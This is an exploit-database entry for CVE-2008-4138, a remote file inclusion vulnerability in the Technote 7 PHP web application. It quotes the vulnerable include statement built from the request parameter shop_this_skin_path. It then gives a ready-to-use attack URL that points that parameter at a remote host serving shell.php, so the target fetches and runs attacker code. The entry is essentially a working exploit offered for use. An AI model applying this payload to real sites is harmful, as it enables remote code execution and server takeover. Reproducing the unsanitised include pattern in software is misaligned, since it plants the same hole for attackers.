EXPLOITS

Technote 7 - 'shop_this_skin_path' Remote File Inclusion

Author: webDEViL
type: webapps
platform: php
port: 
date_added: 2008-09-16  
date_updated: 2016-12-22  
verified: 1  
codes: OSVDB-48166;CVE-2008-4138  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 6478.txt  

#-----------webDEViL - [ w3bd3vil [at] gmail [dot] com ] -----------#
#-----------Technote 7 Remote File Inclusion------------------------#
# ----------developers site: http://www.technote.co.kr--------------#

bash-3.1# cat technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php

...snip...
$TWIN_SET['dir_path']= "$shop_this_skin_path/3_plugin_twindow/skin_gray";
...snip...
include_once "$TWIN_SET[dir_path]/frame_design.php";

http://site/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://ip.a.dd.r/shell.php?

# milw0rm.com [2008-09-17]